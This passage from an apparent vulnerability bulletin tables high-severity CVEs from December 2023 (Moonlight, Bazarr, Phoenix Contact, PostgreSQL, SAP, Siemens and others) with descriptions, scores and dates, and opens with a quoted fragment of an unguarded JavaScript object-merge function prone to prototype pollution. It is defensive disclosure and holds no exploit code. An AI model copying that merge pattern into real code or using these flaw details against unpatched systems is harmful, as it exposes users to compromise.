{} target[name] = Util.extend(clone, copy) } else { target[name] = copy } } } return target }

[TD]
2023-12-08
[/TD]
[TD]
8.2
[/TD]
[TD]CVE-2023-26158
[email protected]
[email protected][/TD]

[TR]
[TD]
moonlight-stream -- moonlight-common-c
[/TD]
[TD]
Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 02b7742f4d19631024bd766bd2bb76715780004e.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-42799
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
moonlight-stream -- moonlight-common-c
[/TD]
[TD]
Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 24750d4b748fefa03d09fcfd6d45056faca354e0.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-42800
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
moonlight-stream -- moonlight-common-c

[/TD]
[TD]
Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit f57bd745b4cbed577ea654fad4701bea4d38b44c. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client. Achieving RCE is possible but unlikely, due to stack canaries in use by modern compiler toolchains. The published binaries for official clients Qt, Android, iOS/tvOS, and Embedded are built with stack canaries, but some unofficial clients may not use stack canaries. This vulnerability takes place after the pairing process, so it requires the client to be tricked into pairing to a malicious host. It is not possible to perform using a man-in-the-middle due to public key pinning that takes place during the pairing process. The bug was addressed in commit b2497a3918a6d79808d9fd0c04734786e70d5954.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-42801
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
morpheus65535 -- bazarr
[/TD]
[TD]
Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-50264
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
morpheus65535 -- bazarr
[/TD]
[TD]
Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-50265
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
mullvad -- mullvad_vpn
[/TD]
[TD]
An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
7.8
[/TD]
[TD]CVE-2023-50446
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
multisuns -- easylog_web+
[/TD]
[TD]
Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-48388
[email protected][/TD]
[/TR]
[TR]
[TD]
multisuns -- easylog_web+
[/TD]
[TD]
Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-48390
[email protected][/TD]
[/TR]
[TR]
[TD]
multisuns -- easylog_web+
[/TD]
[TD]
Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-48389
[email protected][/TD]
[/TR]
[TR]
[TD]
nadatel -- at-0402r_firmware
[/TD]
[TD]
Improper Authentication vulnerability in Nadatel DVR allows Information Elicitation.This issue affects DVR: from 3.0.0 before 9.9.0.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-45801
[email protected][/TD]
[/TR]
[TR]
[TD]
ncp-e -- secure_enterprise_client
[/TD]
[TD]
Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link.
[/TD]
[TD]
2023-12-09
[/TD]
[TD]
8.1
[/TD]
[TD]CVE-2023-28868
[email protected][/TD]
[/TR]
[TR]
[TD]
netgear -- rbr750_firmware
[/TD]
[TD]
In Netgear Orbi RBR750 firmware before V7.2.6.21, there is a stack-based buffer overflow in /usr/sbin/httpd.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-49007
[email protected][/TD]
[/TR]
[TR]
[TD]
openjournalsystems -- open_journal_systems
[/TD]
[TD]
A vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.
[/TD]
[TD]
2023-12-11
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6671
[email protected][/TD]
[/TR]
[TR]
[TD]
openzeppelin -- contracts
[/TD]
[TD]
OpenZeppelin Contracts is a library for smart contract development. A merge issue when porting the 5.0.1 patch to the 4.9 branch caused a line duplication. In the version of Multicall.sol released in @openzeppelin/[email protected] and @openzeppelin/[email protected], all subcalls are executed twice. Concretely, this exposes a user to unintentionally duplicate operations like asset transfers. The duplicated delegatecall was removed in version 4.9.5. The 4.9.4 version is marked as deprecated. Users are advised to upgrade. There are no known workarounds for this issue.
[/TD]
[TD]
2023-12-09
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-49798
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
palo_alto_networks -- pan-os
[/TD]
[TD]
A DOM-Based cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a remote attacker to execute a JavaScript payload in the context of an administrator's browser when they view a specifically crafted link to the PAN-OS web interface.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6790
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- automation_worx_software_suite
[/TD]
[TD]
Incorrect Permission Assignment for Critical Resource vulnerability in multiple products of the PHOENIX CONTACT classic line allow an remote unauthenticated attacker to gain full access of the affected device.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-46141
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- automation_worx_software_suite
[/TD]
[TD]
Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT classic line PLCs allows an unauthenticated remote attacker to modify some or all applications on a PLC.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46143
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- axc_f_1152
[/TD]
[TD]
A incorrect permission assignment for critical resource vulnerability in PLCnext products allows an remote attacker with low privileges to gain full access on the affected devices.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-46142
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- axc_f_1152
[/TD]
[TD]
A download of code without integrity check vulnerability in PLCnext products allows an remote attacker with low privileges to compromise integrity on the affected engineering station and the connected devices.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.7
[/TD]
[TD]CVE-2023-46144
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- multiprog
[/TD]
[TD]
Incorrect Permission Assignment for Critical Resource vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to upload arbitrary malicious code and gain full access on the affected device.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-0757
[email protected][/TD]
[/TR]
[TR]
[TD]
phoenix_contact -- multiprog
[/TD]
[TD]
Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to download and execute applications without integrity checks on the device which may result in a complete loss of integrity.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-5592
[email protected][/TD]
[/TR]
[TR]
[TD]
photon_os -- photon_os
[/TD]
[TD]
The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling 'file' pointer.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.8
[/TD]
[TD]CVE-2022-22942
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
phpems -- phpems
[/TD]
[TD]
A vulnerability classified as critical was found in PHPEMS 6.x/7.0. Affected by this vulnerability is an unknown functionality in the library lib/session.cls.php of the component Session Data Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247357 was assigned to this vulnerability.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6654
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
phpgurukul -- nipah_virus_testing_management_system
[/TD]
[TD]
A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6648
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
postgresql -- postgresql
[/TD]
[TD]
A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-5869
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
progress_software_corporation -- whatsup_gold
[/TD]
[TD]
In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within a dashboard component. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-6364
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
progress_software_corporation -- whatsup_gold
[/TD]
[TD]
In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within a device group. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-6365
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
progress_software_corporation -- whatsup_gold
[/TD]
[TD]
In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within Alert Center. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-6366
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
progress_software_corporation -- whatsup_gold
[/TD]
[TD]
In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within Roles. If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-6367
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
progress_software_corporation -- whatsup_gold
[/TD]
[TD]
In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6595
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Granafa authenticated user) or from the Loki REST API without authentication.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.1
[/TD]
[TD]CVE-2023-36649
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-36646
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.2
[/TD]
[TD]CVE-2023-36648
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-36647
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-36650
[email protected][/TD]
[/TR]
[TR]
[TD]
prolion -- cryptospike
[/TD]
[TD]
Hidden and hard-coded credentials in ProLion CryptoSpike 3.0.15P2 allow remote attackers to login to web management as super-admin and consume the most privileged REST API endpoints via these credentials.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-36651
[email protected][/TD]
[/TR]
[TR]
[TD]
pyinstaller -- pyinstaller
[/TD]
[TD]
PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if all the following are satisfied: 1. The user runs an application containing either matplotlib or win32com. 2. The application is ran as administrator (or at least a user with higher privileges than the attacker). 3. The user's temporary directory is not locked to that specific user (most likely due to TMP/TEMP environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between shutil.rmtree()'s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to pyinstaller >= 5.13.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
[/TD]
[TD]
2023-12-09
[/TD]
[TD]
7.8
[/TD]
[TD]CVE-2023-49797
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
qnap -- qts
[/TD]
[TD]
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-32968
[email protected][/TD]
[/TR]
[TR]
[TD]
qnap -- qts
[/TD]
[TD]
A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-32975
[email protected][/TD]
[/TR]
[TR]
[TD]
qnap -- qvr_firmware
[/TD]
[TD]
An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QVR Firmware 5.0.0 and later
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-47565
[email protected][/TD]
[/TR]
[TR]
[TD]
quarkus -- quarkus
[/TD]
[TD]
A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions.
[/TD]
[TD]
2023-12-09
[/TD]
[TD]
9.1
[/TD]
[TD]CVE-2023-6394
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
raghu_goriya -- mytube_playlist
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Raghu Goriya MyTube PlayList allows Reflected XSS.This issue affects MyTube PlayList: from n/a through 2.0.3.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-48767
[email protected][/TD]
[/TR]
[TR]
[TD]
relyum -- rely-pcie_firmware
[/TD]
[TD]
An issue discovered in Relyum RELY-PCIe 22.2.1 devices. The authorization mechanism is not enforced in the web interface, allowing a low-privileged user to execute administrative functions.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-47573
[email protected][/TD]
[/TR]
[TR]
[TD]
repox -- repox
[/TD]
[TD]
An authentication bypass vulnerability has been found in Repox, which allows a remote user to send a specially crafted POST request, due to the lack of any authentication method, resulting in the alteration or creation of users.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
9.4
[/TD]
[TD]CVE-2023-6718
[email protected][/TD]
[/TR]
[TR]
[TD]
repox -- repox
[/TD]
[TD]
An unrestricted file upload vulnerability has been identified in Repbox, which allows an attacker to upload malicious files via the transforamationfileupload function, due to the lack of proper file type validation controls, resulting in a full system compromise.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6723
[email protected][/TD]
[/TR]
[TR]
[TD]
repox -- repox
[/TD]
[TD]
An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.3
[/TD]
[TD]CVE-2023-6721
[email protected][/TD]
[/TR]
[TR]
[TD]
repox -- repox
[/TD]
[TD]
A path traversal vulnerability has been detected in Repox, which allows an attacker to read arbitrary files on the running server, resulting in a disclosure of sensitive information. An attacker could access files such as application code or data, backend credentials, operating system files...
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6722
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- \@sap\/xssec
[/TD]
[TD]
SAP BTP Security Services Integration Library ([Node.js] @sap/xssec - versions < 3.6.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-49583
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- business_objects_business_intelligence_platform
[/TD]
[TD]
SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS allowing an attacker to upload agnostic documents in the system which when opened by any other user could lead to high impact on integrity of the application.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2023-42478
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- cloud-security-client-go
[/TD]
[TD]
SAP BTP Security Services Integration Library ([Golang] github.com/sap/cloud-security-client-go) - versions < 0.17.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-50424
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- cloud-security-services-integration-library
[/TD]
[TD]
SAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) - versions below 2.17.0 and versions from 3.0.0 to before 3.3.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-50422
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- commerce_cloud
[/TD]
[TD]
In SAP Commerce Cloud - versions HY_COM 1905, HY_COM 2005, HY_COM2105, HY_COM 2011, HY_COM 2205, COM_CLOUD 2211, a locked B2B user can misuse the forgotten password functionality to un-block his user account again and re-gain access if SAP Commerce Cloud - Composable Storefront is used as storefront, due to weak access controls in place. This leads to a considerable impact on confidentiality and integrity.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.1
[/TD]
[TD]CVE-2023-42481
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap -- sap-xssec
[/TD]
[TD]
SAP BTP Security Services Integration Library ([Python] sap-xssec) - versions < 4.1.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-50423
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap_se -- multiple_products
[/TD]
[TD]
SAP GUI for Windows and SAP GUI for Java - versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.3
[/TD]
[TD]CVE-2023-49580
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sap_se -- sap_emarsys_sdk_android
[/TD]
[TD]
Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-6542
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
schneider_electric -- trio_q-series_ethernet_data_radio
[/TD]
[TD]
A CWE-601:URL Redirection to Untrusted Site ('Open Redirect') vulnerability exists that could cause disclosure of information through phishing attempts over HTTP.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.2
[/TD]
[TD]CVE-2023-5629
[email protected][/TD]
[/TR]
[TR]
[TD]
searchor -- searchor
[/TD]
[TD]
main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-43364
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sensormatic_electronics -- iosmart
[/TD]
[TD]
An attacker with physical access to the Kantech Gen1 ioSmart card reader with firmware version prior to 1.07.02 in certain circumstances can recover the reader's communication memory between the card and reader.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-0248
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
seraphinite_solutions -- seraphinite_accelerator
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Seraphinite Solutions Seraphinite Accelerator allows Reflected XSS.This issue affects Seraphinite Accelerator: from n/a through 2.20.28.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49740
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- logo!
[/TD]
[TD]
A vulnerability has been identified in LOGO! 12/24RCE (All versions >= V8.3), LOGO! 12/24RCEo (All versions >= V8.3), LOGO! 230RCE (All versions >= V8.3), LOGO! 230RCEo (All versions >= V8.3), LOGO! 24CE (All versions >= V8.3), LOGO! 24CEo (All versions >= V8.3), LOGO! 24RCE (All versions >= V8.3), LOGO! 24RCEo (All versions >= V8.3), SIPLUS LOGO! 12/24RCE (All versions >= V8.3), SIPLUS LOGO! 12/24RCEo (All versions >= V8.3), SIPLUS LOGO! 230RCE (All versions >= V8.3), SIPLUS LOGO! 230RCEo (All versions >= V8.3), SIPLUS LOGO! 24CE (All versions >= V8.3), SIPLUS LOGO! 24CEo (All versions >= V8.3), SIPLUS LOGO! 24RCE (All versions >= V8.3), SIPLUS LOGO! 24RCEo (All versions >= V8.3). Affected devices are vulnerable to an electromagnetic fault injection. This could allow an attacker to dump and debug the firmware, including the manipulation of memory. Further actions could allow to inject public keys of custom created key pairs which are then signed by the product CA. The generation of a custom certificate allows communication with, and impersonation of, any device of the same version.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.6
[/TD]
[TD]CVE-2022-42784
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle HTTP(S) requests to the web server correctly. This could allow an attacker to exhaust system resources and create a denial of service condition for the device.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2022-47374
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle long file names correctly. This could allow an attacker to create a buffer overflow and create a denial of service condition for the device.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2022-47375
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
